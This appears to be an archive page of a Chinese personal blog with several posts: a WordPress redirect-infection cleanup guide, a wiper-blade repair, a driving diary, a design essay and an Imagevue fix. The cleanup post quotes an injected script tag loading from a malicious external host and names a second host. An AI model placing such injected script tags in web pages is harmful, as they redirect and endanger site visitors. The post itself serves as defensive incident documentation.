Archive for the ‘我的随笔’ Category

WordPress重定向漏洞

今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。 <script src=”http://ae.awaue.com/7″></script> 症状: 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的) 也可能被重定向到googlesearch.com,不过这个已被禁用。 但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。 解决方案如下,范讲一下,不只针对(mt)主机: 登录你主机的管理后台,进入数据库管理,也就是mysqladmin 在左边列表里找到你的wordpress所在数据库,如db_blog 点击进入后,在顶部找到”SQL”一项,点击 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息: UPDATE wp_posts SET post_content = replace( post_content, ‘<script src=”http://ae.awaue.com/7″></script>’, ‘ ‘) 接下来运行这段语句 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条…… 需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。 目前已发现的可疑脚本有以下两个: ae.awaue.com/7 ie.eracou.com/3 如果未来发现有新的可疑脚本,请随时留意这里的更新

自己动手换雨刷

雨刷器刮不干净!上周买的胶条送到了,今天抽空洗车、打蜡,本想在洗车的地方把雨刷的胶条换上,可没想那的师傅居然研究半天对我说——这东西卸不下来,卡子一掰就断了。靠谁不如靠自己,跟他学了一招,知道怎么能把整个雨刷条卸下来了,既然别人不行,我就自己动手。 先说,无骨雨刷非常方便,结构简单,而且冬天不用担心被冻住,这是简单设计的代表作。其次,今天自己操刀后的感受是,科技发展推动技术革新会让用户感到无比省心,高度集成,模块化的设计,使零件成本,维修成本进一步降低。 80块钱的雨刷胶条+自己动手的乐趣。雨刷架一个要100多,所以淘宝了一下,买了两条原厂胶条,质量不错。先研究下这东西什么原理,一长一短,原来还真没注意,长的是主驾这边,短的是副驾那边。(最长的是原厂胶条,根据自己需要剪)

行车记-一年

车开了一年了,遇到的事多了,成长的也就快。开始写周记,后来发现太频繁、啰嗦。看过我行车记 1,2,3,4 的朋友应该知道都曾遭遇过哪些磨难……如今车开的是比以前熟练些,对车的控制也提升了不少,但有一个不好的迹象开始浮现——溜号!虽然今天,我没法再分享一个新手的成长日记,但要告诫驾龄1年左右的“老司机”,别大意,得时刻提醒自己谨慎驾驶,为自己更为家人。 上周末出车到绥中参加好友AY婚礼,以摄影师身份出席,全程跟拍…… 从上海回来后,我们只见过一面——去年我婚礼的时候。上海时,我俩住在一起,浦东新区芳心路的一间70平的2居室中,那里充满了追梦的回忆:一起上班、下班、买菜、做饭、不刷碗,到后来不做饭、吃盒饭、买外卖……5月29号终于和他相识10年的女友结婚了,感动。 后来发现,我身边的朋友基本都是这样的,8年的、9年的、10年的,属我时间短——5年。人和人能走到一起,有共同特点必不可少,其中重要的一点是,都很重感情、讲义气。我身边的东北人都是性情中人,哈~ 俗话说得好,想了解一个人怎么样,先看看他身边的朋友们。 和久别的哥几个见面很开心,边吃边聊,甚至聊到高中大学时代,他们的太太分别回忆道,原来谁谁很闷,上大学以后爱说话了,也变得开朗了……我很得意:“因为他们大一时遇到了一位贵人!”,她们顿时投来仰慕中带有鄙视、欣慰中参杂无奈的目光,我很淡定。人嘛,就是这样,得到肯定之后,才能有更大地进步。 婚礼后,又去了兴城。说实话,当时说要去兴城时,我真是挺不愿意,有阴影,因为去年8月份的兴城之旅,上演了一出 腾腾历险记,到现在依然记忆犹新,每次路过祖山青龙一代都要骂2分钟,以示宣泄。虽然不情愿,不过最后还是去了,一来老婆要吃海鲜,二来能跟哥几个叙叙旧。这次玩的很爽,吃的也很爽,算是修复了我心中对兴城的印象。说来也巧,返回北京的路上又是“灾难”连连,先是被拍超速,罚款200元扣了我3分;又是高速修路、突降暴雨,雨刷器打到最大档,跑了有7,80公里(不过有上次遭遇,这次淡定了很多);最后快到北京,3车道的高速路只有最外侧一条道可用,所有车排成一排艰难前行…… 看到这,也就不奇怪为啥我对去兴城有阴影了。不过最后还好,到北京艳阳高照,少见的蓝天白云,平安到家。这个周末准备去做3保了,19000多公里了,才1年时间,照这么算,10万公里也就5年的事。到目前为止,腾腾的表现一直很稳定,也越来越熟悉彼此的脾气了,现在城市综合油耗9.4L/100公里,高速油耗7.5L/100公里。

业界标竿·设计师的悲哀

一个月前,一次需求评审中的争吵,让我开始对这个问题产生了兴趣。到底是什么束缚了设计师的创新?是做一个好的服从者?还是把自己独到的想法应用到产品设计中? 这个问题绝对不是单选!在大公司中体现的尤为突出。来自各方面的制约——各种规范、各部门间的利益、各产品间互通,甚至个人喜好,都对最终产品的诞生起着潜移默化的影响。 在中国,没有几家互联网公司能给设计师很长时间去研究、创造……在这种环境下,我们听到最多的话就是:“某某是这么做的,你就照他那样做……”,“这个功能要加上,某某已经有这个功能了……” 一时间,随着某个产品、功能风起云涌,引得众人纷纷效仿,不久之后的市场上一定百花齐放,个别经典功能随之成了业界公认的标配,成了标竿。在它之后出现的产品,一定要具备前者身上所有特点。 这些需求给设计师提出了新的挑战:如果从一开始就模仿前人,这些设计师是幸运的,要做的就是继续模仿下去;而开始就倔强着,要为自己创造的,对不起,你必须继续艰难地创造下去。这,正是设计师的悲哀。但我坚信后者成功,在独立思考下结合自身特点,量身打造的产品,一定会成为有竞争力的产品,只有这样,才能整合起公司资源。 就拿风头正盛的微博来说,新浪微博的成功并非偶然,它代表了自己的特色和需求。去效仿新浪的微博不会成功,因为他的需求和你的未必一样,所拥有的资源也不尽相同。一定要有自己的特色,不能被标竿累住,今天在老板面前倔强,是为了让你的团队、你的产品在明天的市场上倔强。 踏着别人的脚步前进,超越就无从谈起! 悲哀来源于对产品认识不足、自信心不够,所以总被需求方用业界标竿打压。在基础架构上创新,制造差异化,做有灵魂的产品。团队信心的培养非常重要,让每位成员在自己岗位上都有创新,收获自信,团队才能更有凝聚力。同时,在说服对方之前,先尊重对方,倾听从他的角度出发得出的结论,不要急于否定。

Imagevue架在(mt)上遇到的问题与解决

年前给我的Flickr续费,直接买了两年。两天后,Flickr farm5集群被封,导致很多新照片都看不到了。就连现在我自己更新图片都要翻墙更新才行,我在考虑要不要把图片名称、描述、Tag等都改成英文,以便扩大在海外的知名度…… 在欣赏过一个朋友的图片专题后,被画面和音乐深深感动,决定搭一个环境给自己,记录属于自己的感动。相册程序采用Imagevue,Flash+PHP的,效果很炫,同时能给我充分的定制空间。不过原本简单的事,折腾了我一天,上传到我的mediatemple后一直停在首页loading,无法进行下一步。在本地环境设置好的,怎么可能放到正式环境显示不出来? 按照相关说明,把所有文件夹chmod 777了,还是出不来。但只是前台,后台管理界面可以进,断定程序没问题,可能是某个文件丢失或加载有问题。最后终于找到原因,原来语言包xml加载失败,导致卡在loading界面: 上图标红处就是问题所在。FTP上去查看文件都在,并没有缺失,点过去却找不到文件。最后居然是因为严格区分大小写问题,后台setting-language里,我写的是English,后改成english,问题解决。 上图红框处,必须小写。之所以开始想都没想过,是因为在后台Language里给的提示就是English,我直接粘过来的…… 同时,正如各位网友所说,Imagevue对中文的支持确实不咋地,慎用。图片名称和描述用中文,可能会出现菜单无法弹开、无法查看下一张图片。还有在Firefox下点图片,会出横竖滚动条,还没查,希望是样式问题,官网demo也有同样问题。